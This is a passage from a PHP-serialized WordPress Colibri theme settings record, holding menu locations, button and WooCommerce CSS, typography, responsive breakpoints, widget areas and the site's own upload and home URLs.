\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}s:6:\"bottom\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}}}}s:5:\"media\";a:2:{s:6:\"mobile\";a:1:{s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:30;s:4:\"unit\";s:2:\"px\";}}s:6:\"tablet\";a:1:{s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:60;s:4:\"unit\";s:2:\"px\";}}}}s:4:\"menu\";a:2:{s:16:\"defaultLocations\";a:3:{s:6:\"header\";a:2:{i:0;a:3:{s:2:\"id\";s:11:\"header-menu\";s:5:\"label\";s:19:\"Header primary menu\";s:8:\"priority\";i:1;}i:1;a:3:{s:2:\"id\";s:13:\"header-menu-1\";s:5:\"label\";s:21:\"Header secondary menu\";s:8:\"priority\";i:2;}}s:7:\"content\";a:1:{i:0;a:3:{s:2:\"id\";s:12:\"content-menu\";s:5:\"label\";s:12:\"In Page Menu\";s:8:\"priority\";i:1;}}s:6:\"footer\";a:2:{i:0;a:3:{s:2:\"id\";s:11:\"footer-menu\";s:5:\"label\";s:19:\"Footer primary menu\";s:8:\"priority\";i:1;}i:1;a:3:{s:2:\"id\";s:13:\"footer-menu-1\";s:5:\"label\";s:21:\"Footer secondary menu\";s:8:\"priority\";i:2;}}}s:9:\"locations\";a:5:{i:0;a:2:{s:2:\"id\";s:11:\"header-menu\";s:5:\"label\";s:19:\"Header primary menu\";}i:1;a:2:{s:2:\"id\";s:13:\"header-menu-1\";s:5:\"label\";s:21:\"Header secondary menu\";}i:2;a:2:{s:2:\"id\";s:12:\"content-menu\";s:5:\"label\";s:12:\"In Page Menu\";}i:3;a:2:{s:2:\"id\";s:11:\"footer-menu\";s:5:\"label\";s:19:\"Footer primary menu\";}i:4;a:2:{s:2:\"id\";s:13:\"footer-menu-1\";s:5:\"label\";s:21:\"Footer secondary menu\";}}}s:3:\"css\";s:24448:\"\r\n.h-y-container > *:not(:last-child), .h-x-container-inner > * {\n  margin-bottom: 20px;\n}\n.h-x-container-inner, .h-column__content > .h-x-container > *:last-child {\n  margin-bottom: -20px;\n}\n.h-x-container-inner > * {\n  padding-left: 10px;\n  padding-right: 10px;\n}\n.h-x-container-inner {\n  margin-left: -10px;\n  margin-right: -10px;\n}\n[class*=style-], [class*=local-style-], .h-global-transition, .h-global-transition-all, .h-global-transition-all * {\n  transition-duration: 0.5s;\n}\n.wp-block-button .wp-block-button__link:not(.has-background),.wp-block-file .wp-block-file__button {\n  background-color: #303e7a;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link:not(.has-background):hover,.wp-block-button .wp-block-button__link:not(.has-background):focus,.wp-block-button .wp-block-button__link:not(.has-background):active,.wp-block-file .wp-block-file__button:hover,.wp-block-file .wp-block-file__button:focus,.wp-block-file .wp-block-file__button:active {\n  background-color: rgb(7, 29, 122);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background) {\n  color: #303e7a;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #303e7a;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #303e7a;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #303e7a;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):hover,.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):focus,.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):active {\n  color: #fff;\n  background-color: #303e7a;\n  background-image: none;\n}\n.has-background-color,*[class^=\"wp-block-\"].is-style-solid-color {\n  background-color: #303e7a;\n  background-image: none;\n}\n.has-colibri-color-1-background-color {\n  background-color: #303e7a;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color {\n  background-color: #303e7a;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:active {\n  background-color: rgb(7, 29, 122);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color {\n  color: #303e7a;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #303e7a;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #303e7a;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #303e7a;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:active {\n  color: #fff;\n  background-color: #303e7a;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-1-background-color,*[class^=\"wp-block-\"] .has-colibri-color-1-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-1-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-1-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-1-color p {\n  background-color: #303e7a;\n  background-image: none;\n}\n.has-colibri-color-1-color {\n  color: #303e7a;\n}\n.has-colibri-color-2-background-color {\n  background-color: #f7e597;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color {\n  background-color: #f7e597;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:active {\n  background-color: rgb(162, 150, 99);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color {\n  color: #f7e597;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #f7e597;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #f7e597;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #f7e597;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #f7e597;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:active {\n  color: #fff;\n  background-color: #f7e597;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-2-background-color,*[class^=\"wp-block-\"] .has-colibri-color-2-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-2-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-2-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-2-color p {\n  background-color: #f7e597;\n  background-image: none;\n}\n.has-colibri-color-2-color {\n  color: #f7e597;\n}\n.has-colibri-color-3-background-color {\n  background-color: #f66161;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color {\n  background-color: #f66161;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:active {\n  background-color: rgb(161, 63, 63);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color {\n  color: #f66161;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #f66161;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #f66161;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #f66161;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #f66161;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:active {\n  color: #fff;\n  background-color: #f66161;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-3-background-color,*[class^=\"wp-block-\"] .has-colibri-color-3-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-3-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-3-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-3-color p {\n  background-color: #f66161;\n  background-image: none;\n}\n.has-colibri-color-3-color {\n  color: #f66161;\n}\n.has-colibri-color-4-background-color {\n  background-color: #9ec9e2;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color {\n  background-color: #9ec9e2;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:active {\n  background-color: rgb(7, 146, 226);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color {\n  color: #9ec9e2;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #9ec9e2;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #9ec9e2;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #9ec9e2;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #9ec9e2;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:active {\n  color: #fff;\n  background-color: #9ec9e2;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-4-background-color,*[class^=\"wp-block-\"] .has-colibri-color-4-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-4-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-4-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-4-color p {\n  background-color: #9ec9e2;\n  background-image: none;\n}\n.has-colibri-color-4-color {\n  color: #9ec9e2;\n}\n.has-colibri-color-5-background-color {\n  background-color: #f6f8fa;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color {\n  background-color: #f6f8fa;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:active {\n  background-color: rgb(162, 164, 165);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color {\n  color: #f6f8fa;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #f6f8fa;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #f6f8fa;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #f6f8fa;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #f6f8fa;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:active {\n  color: #fff;\n  background-color: #f6f8fa;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-5-background-color,*[class^=\"wp-block-\"] .has-colibri-color-5-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-5-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-5-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-5-color p {\n  background-color: #f6f8fa;\n  background-image: none;\n}\n.has-colibri-color-5-color {\n  color: #f6f8fa;\n}\n.has-colibri-color-6-background-color {\n  background-color: #202a54;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color {\n  background-color: #202a54;\n  background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:active {\n  background-color: rgb(32, 42, 84);\n  background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color {\n  color: #202a54;\n  background-color: transparent;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #202a54;\n  border-top-style: solid;\n  border-right-width: 2px;\n  border-right-color: #202a54;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #202a54;\n  border-bottom-style: solid;\n  border-left-width: 2px;\n  border-left-color: #202a54;\n  border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:active {\n  color: #fff;\n  background-color: #202a54;\n  background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-6-background-color,*[class^=\"wp-block-\"] .has-colibri-color-6-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-6-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-6-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-6-color p {\n  background-color: #202a54;\n  background-image: none;\n}\n.has-colibri-color-6-color {\n  color: #202a54;\n}\n#colibri .woocommerce-store-notice,#colibri.woocommerce .content .h-section input[type=submit],#colibri.woocommerce-page  .content .h-section  input[type=button],#colibri.woocommerce .content .h-section  input[type=button],#colibri.woocommerce-page  .content .h-section .button,#colibri.woocommerce .content .h-section .button,#colibri.woocommerce-page  .content .h-section  a.button,#colibri.woocommerce .content .h-section  a.button,#colibri.woocommerce-page  .content .h-section button.button,#colibri.woocommerce .content .h-section button.button,#colibri.woocommerce-page  .content .h-section input.button,#colibri.woocommerce .content .h-section input.button,#colibri.woocommerce-page  .content .h-section input#submit,#colibri.woocommerce .content .h-section input#submit,#colibri.woocommerce-page  .content .h-section a.added_to_cart,#colibri.woocommerce .content .h-section a.added_to_cart,#colibri.woocommerce-page  .content .h-section .ui-slider-range,#colibri.woocommerce .content .h-section .ui-slider-range,#colibri.woocommerce-page  .content .h-section .ui-slider-handle,#colibri.woocommerce .content .h-section .ui-slider-handle {\n  background-color: #303e7a;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: #303e7a;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #303e7a;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #303e7a;\n  border-left-style: solid;\n}\n#colibri .woocommerce-store-notice:hover,#colibri .woocommerce-store-notice:focus,#colibri .woocommerce-store-notice:active,#colibri.woocommerce .content .h-section input[type=submit]:hover,#colibri.woocommerce .content .h-section input[type=submit]:focus,#colibri.woocommerce .content .h-section input[type=submit]:active,#colibri.woocommerce-page  .content .h-section  input[type=button]:hover,#colibri.woocommerce-page  .content .h-section  input[type=button]:focus,#colibri.woocommerce-page  .content .h-section  input[type=button]:active,#colibri.woocommerce .content .h-section  input[type=button]:hover,#colibri.woocommerce .content .h-section  input[type=button]:focus,#colibri.woocommerce .content .h-section  input[type=button]:active,#colibri.woocommerce-page  .content .h-section .button:hover,#colibri.woocommerce-page  .content .h-section .button:focus,#colibri.woocommerce-page  .content .h-section .button:active,#colibri.woocommerce .content .h-section .button:hover,#colibri.woocommerce .content .h-section .button:focus,#colibri.woocommerce .content .h-section .button:active,#colibri.woocommerce-page  .content .h-section  a.button:hover,#colibri.woocommerce-page  .content .h-section  a.button:focus,#colibri.woocommerce-page  .content .h-section  a.button:active,#colibri.woocommerce .content .h-section  a.button:hover,#colibri.woocommerce .content .h-section  a.button:focus,#colibri.woocommerce .content .h-section  a.button:active,#colibri.woocommerce-page  .content .h-section button.button:hover,#colibri.woocommerce-page  .content .h-section button.button:focus,#colibri.woocommerce-page  .content .h-section button.button:active,#colibri.woocommerce .content .h-section button.button:hover,#colibri.woocommerce .content .h-section button.button:focus,#colibri.woocommerce .content .h-section button.button:active,#colibri.woocommerce-page  .content .h-section input.button:hover,#colibri.woocommerce-page  .content .h-section input.button:focus,#colibri.woocommerce-page  .content .h-section input.button:active,#colibri.woocommerce .content .h-section input.button:hover,#colibri.woocommerce .content .h-section input.button:focus,#colibri.woocommerce .content .h-section input.button:active,#colibri.woocommerce-page  .content .h-section input#submit:hover,#colibri.woocommerce-page  .content .h-section input#submit:focus,#colibri.woocommerce-page  .content .h-section input#submit:active,#colibri.woocommerce .content .h-section input#submit:hover,#colibri.woocommerce .content .h-section input#submit:focus,#colibri.woocommerce .content .h-section input#submit:active,#colibri.woocommerce-page  .content .h-section a.added_to_cart:hover,#colibri.woocommerce-page  .content .h-section a.added_to_cart:focus,#colibri.woocommerce-page  .content .h-section a.added_to_cart:active,#colibri.woocommerce .content .h-section a.added_to_cart:hover,#colibri.woocommerce .content .h-section a.added_to_cart:focus,#colibri.woocommerce .content .h-section a.added_to_cart:active,#colibri.woocommerce-page  .content .h-section .ui-slider-range:hover,#colibri.woocommerce-page  .content .h-section .ui-slider-range:focus,#colibri.woocommerce-page  .content .h-section .ui-slider-range:active,#colibri.woocommerce .content .h-section .ui-slider-range:hover,#colibri.woocommerce .content .h-section .ui-slider-range:focus,#colibri.woocommerce .content .h-section .ui-slider-range:active,#colibri.woocommerce-page  .content .h-section .ui-slider-handle:hover,#colibri.woocommerce-page  .content .h-section .ui-slider-handle:focus,#colibri.woocommerce-page  .content .h-section .ui-slider-handle:active,#colibri.woocommerce .content .h-section .ui-slider-handle:hover,#colibri.woocommerce .content .h-section .ui-slider-handle:focus,#colibri.woocommerce .content .h-section .ui-slider-handle:active {\n  background-color: rgb(7, 29, 122);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: rgb(7, 29, 122);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(7, 29, 122);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(7, 29, 122);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(7, 29, 122);\n  border-left-style: solid;\n}\n#colibri.woocommerce-page  .content .h-section .star-rating::before,#colibri.woocommerce .content .h-section .star-rating::before,#colibri.woocommerce-page  .content .h-section .star-rating span::before,#colibri.woocommerce .content .h-section .star-rating span::before {\n  color: #303e7a;\n}\n#colibri.woocommerce-page  .content .h-section .price,#colibri.woocommerce .content .h-section .price {\n  color: #303e7a;\n}\n#colibri.woocommerce-page  .content .h-section .price del,#colibri.woocommerce .content .h-section .price del {\n  color: rgb(89, 95, 122);\n}\n#colibri.woocommerce-page  .content .h-section .onsale,#colibri.woocommerce .content .h-section .onsale {\n  background-color: #303e7a;\n  background-image: none;\n}\n#colibri.woocommerce-page  .content .h-section .onsale:hover,#colibri.woocommerce-page  .content .h-section .onsale:focus,#colibri.woocommerce-page  .content .h-section .onsale:active,#colibri.woocommerce .content .h-section .onsale:hover,#colibri.woocommerce .content .h-section .onsale:focus,#colibri.woocommerce .content .h-section .onsale:active {\n  background-color: rgb(7, 29, 122);\n  background-image: none;\n}\n#colibri.woocommerce ul.products li.product h2:hover {\n  color: #303e7a;\n}\n#colibri.woocommerce-page  .content .h-section .woocommerce-pagination .page-numbers.current,#colibri.woocommerce .content .h-section .woocommerce-pagination .page-numbers.current,#colibri.woocommerce-page  .content .h-section .woocommerce-pagination a.page-numbers:hover,#colibri.woocommerce .content .h-section .woocommerce-pagination a.page-numbers:hover {\n  background-color: #303e7a;\n  background-image: none;\n}\n#colibri.woocommerce-page  .content .h-section .comment-form-rating .stars a,#colibri.woocommerce .content .h-section .comment-form-rating .stars a {\n  color: #303e7a;\n}\n.h-section-global-spacing {\n  padding-top: 90px;\n  padding-bottom: 90px;\n}\n#colibri .colibri-language-switcher {\n  background-color: white;\n  background-image: none;\n  top: 80px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 4px;\n  border-top-right-radius: 0px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 4px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .colibri-language-switcher .lang-item {\n  padding-top: 14px;\n  padding-right: 18px;\n  padding-bottom: 14px;\n  padding-left: 18px;\n}\nbody {\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(64, 85, 169);\n}\nbody a {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 1em;\n  line-height: 1.5;\n  color: #03a9f4;\n}\nbody p {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(64, 85, 169);\n}\nbody .h-lead p {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 300;\n  font-size: 1.25em;\n  line-height: 1.5;\n  color: rgb(60, 65, 84);\n}\nbody blockquote p {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  line-height: 1.6;\n  color: rgb(64, 85, 169);\n}\nbody h1 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 300;\n  font-size: 3.375em;\n  line-height: 1.26;\n  color: rgb(32, 42, 84);\n}\nbody h2 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 300;\n  font-size: 2.625em;\n  line-height: 1.143;\n  color: rgb(32, 42, 84);\n}\nbody h3 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 300;\n  font-size: 2.25em;\n  line-height: 1.25;\n  color: rgb(32, 42, 84);\n}\nbody h4 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 1.25em;\n  line-height: 1.6;\n  color: rgb(32, 42, 84);\n}\nbody h5 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 1.125em;\n  line-height: 1.55;\n  color: rgb(32, 42, 84);\n}\nbody h6 {\n  margin-bottom: 16px;\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 1em;\n  line-height: 1.6;\n  color: rgb(32, 42, 84);\n}\n .content.colibri-main-content-single .main-section,.content.colibri-main-content-archive .main-section {\n  padding-top: 90px;\n  padding-bottom: 90px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n  width: 25% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  max-width: 25%;\n}\n\r\n\r\n@media (min-width: 768px) and (max-width: 1023px){\r\n.h-section-global-spacing {\n  padding-top: 60px;\n  padding-bottom: 60px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n  width: 33.33% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  max-width: 33.33%;\n}\n\r\n}\n\r\n@media (max-width: 767px){\r\n.h-section-global-spacing {\n  padding-top: 30px;\n  padding-bottom: 30px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  max-width: 100%;\n}\n\r\n}\n\";s:6:\"medias\";a:3:{s:7:\"desktop\";a:6:{s:2:\"id\";s:7:\"desktop\";s:5:\"label\";s:7:\"desktop\";s:4:\"icon\";s:15:\"desktop_windows\";s:4:\"show\";b:1;s:4:\"main\";b:1;s:10:\"gridPrefix\";s:2:\"lg\";}s:6:\"tablet\";a:7:{s:2:\"id\";s:6:\"tablet\";s:5:\"label\";s:6:\"tablet\";s:4:\"icon\";s:14:\"tablet_android\";s:4:\"show\";b:0;s:5:\"width\";i:1024;s:10:\"gridPrefix\";s:2:\"md\";s:5:\"query\";s:49:\"@media (min-width: 768px) and (max-width: 1023px)\";}s:6:\"mobile\";a:6:{s:2:\"id\";s:6:\"mobile\";s:5:\"label\";s:6:\"mobile\";s:4:\"icon\";s:13:\"phone_android\";s:4:\"show\";b:0;s:5:\"width\";i:480;s:5:\"query\";s:25:\"@media (max-width: 767px)\";}}s:8:\"defaults\";a:1:{s:8:\"partials\";a:4:{s:7:\"sidebar\";a:8:{s:10:\"front_page\";i:-1;s:4:\"page\";i:-1;s:4:\"post\";i:43;s:12:\"archive_post\";i:-1;s:12:\"staff-member\";i:-1;s:20:\"archive_staff-member\";i:-1;s:7:\"product\";i:46;s:15:\"archive_product\";i:-1;}s:6:\"header\";a:8:{s:10:\"front_page\";i:22;s:4:\"page\";i:-1;s:4:\"post\";i:25;s:12:\"archive_post\";i:-1;s:12:\"staff-member\";i:-1;s:20:\"archive_staff-member\";i:-1;s:7:\"product\";i:-1;s:15:\"archive_product\";i:-1;}s:6:\"footer\";a:8:{s:10:\"front_page\";i:-1;s:4:\"page\";i:-1;s:4:\"post\";i:28;s:12:\"archive_post\";i:-1;s:12:\"staff-member\";i:-1;s:20:\"archive_staff-member\";i:-1;s:7:\"product\";i:-1;s:15:\"archive_product\";i:-1;}s:4:\"main\";a:6:{i:404;i:37;s:4:\"post\";i:31;s:7:\"archive\";i:34;s:15:\"archive_product\";i:1732;s:7:\"product\";i:1729;s:6:\"search\";i:40;}}}s:12:\"widget_areas\";a:10:{s:20:\"header-widget-area-1\";a:3:{s:4:\"name\";s:20:\"Header widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:6:\"header\";}s:20:\"header-widget-area-2\";a:3:{s:4:\"name\";s:20:\"Header widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:6:\"header\";}s:20:\"header-widget-area-3\";a:3:{s:4:\"name\";s:20:\"Header widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:6:\"header\";}s:21:\"content-widget-area-1\";a:3:{s:4:\"name\";s:21:\"In page widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:7:\"content\";}s:21:\"content-widget-area-2\";a:3:{s:4:\"name\";s:21:\"In page widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:7:\"content\";}s:21:\"content-widget-area-3\";a:3:{s:4:\"name\";s:21:\"In page widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:7:\"content\";}s:20:\"footer-widget-area-1\";a:3:{s:4:\"name\";s:20:\"Footer widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-2\";a:3:{s:4:\"name\";s:20:\"Footer widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-3\";a:3:{s:4:\"name\";s:20:\"Footer widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-4\";a:3:{s:4:\"name\";s:20:\"Footer widget area 4\";s:5:\"index\";i:4;s:4:\"type\";s:6:\"footer\";}}s:8:\"imported\";a:10:{s:18:\"theme_default_data\";b:1;s:17:\"header/front_page\";b:1;s:11:\"header/post\";b:1;s:11:\"footer/post\";b:1;s:9:\"main/post\";b:1;s:12:\"main/archive\";b:1;s:8:\"main/404\";b:1;s:11:\"main/search\";b:1;s:12:\"sidebar/post\";b:1;s:15:\"sidebar/product\";b:1;}s:4:\"urls\";a:2:{s:19:\"colibri_uploads_url\";s:47:\"https://gsudice.dataconn.net/wp-content/uploads\";s:16:\"colibri_home_url\";s:29:\"https://gsudice.dataconn.net/\";}s:14:\"cssByPartialId\";a:18:{i:22;a:8:{s:12:\"local-22-h26\";a:3:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h26-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-22-h26-outer {\n  width: 80% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h26-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-22-h29\";a:3:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h29-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-22-h29-outer {\n  width: 80% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h29-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-22-h30\";a:1:{s:7:\"desktop\";s:0:\"\";}s:11:\"local-22-h4\";a:2:{s:7:\"desktop\";s:112:\"#colibri .style-local-22-h4-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 